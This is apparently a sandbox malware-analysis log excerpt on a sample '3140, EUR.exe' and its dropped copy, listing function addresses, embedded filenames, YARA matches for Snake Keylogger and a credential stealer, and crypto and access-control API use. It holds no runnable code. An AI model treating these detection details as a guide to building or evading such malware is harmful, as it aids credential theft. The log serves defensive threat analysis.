Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07643918 0_2_07643918
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0785E0E0 0_2_0785E0E0
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0785C468 0_2_0785C468
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0785C478 0_2_0785C478
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0785E0C0 0_2_0785E0C0
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0785D0C9 0_2_0785D0C9
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0785D0D8 0_2_0785D0D8
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07854D00 0_2_07854D00
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07854CF0 0_2_07854CF0
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0785E838 0_2_0785E838
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0785E848 0_2_0785E848
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1D278 8_2_02E1D278
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E15362 8_2_02E15362
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1A088 8_2_02E1A088
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1C147 8_2_02E1C147
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E17118 8_2_02E17118
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1C738 8_2_02E1C738
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1C468 8_2_02E1C468
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1CA08 8_2_02E1CA08
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E169A0 8_2_02E169A0
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1E988 8_2_02E1E988
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1CFA9 8_2_02E1CFA9
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1CCD8 8_2_02E1CCD8
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1F979 8_2_02E1F979
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1E97A 8_2_02E1E97A
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E13E09 8_2_02E13E09
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_04FF0040 9_2_04FF0040
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_04FF001C 9_2_04FF001C
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_04FF3377 9_2_04FF3377
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07634608 9_2_07634608
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076336D0 9_2_076336D0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07630040 9_2_07630040
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07630F28 9_2_07630F28
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763E750 9_2_0763E750
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076336C0 9_2_076336C0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076345F9 9_2_076345F9
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076334C0 9_2_076334C0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076334B1 9_2_076334B1
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07635378 9_2_07635378
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07635331 9_2_07635331
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07635388 9_2_07635388
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07633260 9_2_07633260
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07633250 9_2_07633250
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763C168 9_2_0763C168
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07630007 9_2_07630007
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076330C0 9_2_076330C0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076330B0 9_2_076330B0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07630F17 9_2_07630F17
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07631E40 9_2_07631E40
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07633E40 9_2_07633E40
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07634E40 9_2_07634E40
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07631E50 9_2_07631E50
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07633E50 9_2_07633E50
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07634E50 9_2_07634E50
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07633EFB 9_2_07633EFB
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BD30 9_2_0763BD30
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BD19 9_2_0763BD19
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763DDA0 9_2_0763DDA0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07631C40 9_2_07631C40
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07631C50 9_2_07631C50
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07632A20 9_2_07632A20
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07632A11 9_2_07632A11
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763D967 9_2_0763D967
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763D968 9_2_0763D968
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07633928 9_2_07633928
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07633918 9_2_07633918
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_016EC2E9 15_2_016EC2E9
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_016E27B4 15_2_016E27B4
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056EC46C 15_2_056EC46C
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056EC738 15_2_056EC738
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056EC147 15_2_056EC147
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056E7118 15_2_056E7118
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056EA088 15_2_056EA088
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056E5362 15_2_056E5362
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056ED278 15_2_056ED278
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056ECCD8 15_2_056ECCD8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056ECFAB 15_2_056ECFAB
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056E69A0 15_2_056E69A0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056EE988 15_2_056EE988
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056ECA08 15_2_056ECA08
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056E3E09 15_2_056E3E09
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056EE97B 15_2_056EE97B
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056EF979 15_2_056EF979
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056E29EC 15_2_056E29EC
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056E3AA1 15_2_056E3AA1
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F21E80 15_2_06F21E80
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F217A0 15_2_06F217A0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F20B30 15_2_06F20B30
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F29C70 15_2_06F29C70
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2FC68 15_2_06F2FC68
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F25028 15_2_06F25028
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F22968 15_2_06F22968
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F29548 15_2_06F29548
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2E6B0 15_2_06F2E6B0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2E6AF 15_2_06F2E6AF
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F21E70 15_2_06F21E70
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2E258 15_2_06F2E258
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2E249 15_2_06F2E249
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2DE00 15_2_06F2DE00
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F29BFA 15_2_06F29BFA
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2F3B8 15_2_06F2F3B8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F28BA0 15_2_06F28BA0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2F3A8 15_2_06F2F3A8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F28B91 15_2_06F28B91
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2178F 15_2_06F2178F
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2EF60 15_2_06F2EF60
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2EF51 15_2_06F2EF51
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F20B20 15_2_06F20B20
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F29328 15_2_06F29328
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2EB08 15_2_06F2EB08
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2D0F8 15_2_06F2D0F8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2CCA0 15_2_06F2CCA0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2CC8F 15_2_06F2CC8F
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F20040 15_2_06F20040
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2F810 15_2_06F2F810
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F25018 15_2_06F25018
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2F801 15_2_06F2F801
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F20006 15_2_06F20006
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2DDFF 15_2_06F2DDFF
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2D9A8 15_2_06F2D9A8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2D999 15_2_06F2D999
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2D550 15_2_06F2D550
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2D545 15_2_06F2D545
Source: 3140, EUR.exe, 00000000.00000000.1656247053.0000000000402000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameOqNV.exe> vs 3140, EUR.exe
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs 3140, EUR.exe
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs 3140, EUR.exe
Source: 3140, EUR.exe, 00000000.00000002.1724176185.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs 3140, EUR.exe
Source: 3140, EUR.exe, 00000000.00000002.1743280560.0000000009FD0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs 3140, EUR.exe
Source: 3140, EUR.exe, 00000000.00000002.1740034846.000000000741E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameOqNV.exe> vs 3140, EUR.exe
Source: 3140, EUR.exe, 00000000.00000002.1727021709.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs 3140, EUR.exe
Source: 3140, EUR.exe, 00000008.00000002.4120197349.0000000001177000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs 3140, EUR.exe
Source: 3140, EUR.exe Binary or memory string: OriginalFilenameOqNV.exe> vs 3140, EUR.exe
Source: 3140, EUR.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3140, EUR.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: lkuPOyvaWlIu.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, SwCftK6S58okDsOPI5.cs Security API names: _0020.SetAccessControl
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, SwCftK6S58okDsOPI5.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, SwCftK6S58okDsOPI5.cs Security API names: _0020.AddAccessRule
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, onTDHLANSwQB4GuLwN.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, SwCftK6S58okDsOPI5.cs Security API names: _0020.SetAccessControl
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, SwCftK6S58okDsOPI5.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, SwCftK6S58okDsOPI5.cs Security API names: _0020.AddAccessRule
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, onTDHLANSwQB4GuLwN.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, SwCftK6S58okDsOPI5.cs Security API names: _0020.SetAccessControl
Source: 0.2.3140, EUR.exe.9fd0000.5.raw.unpack, SwCftK6S58okDsOPI5.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
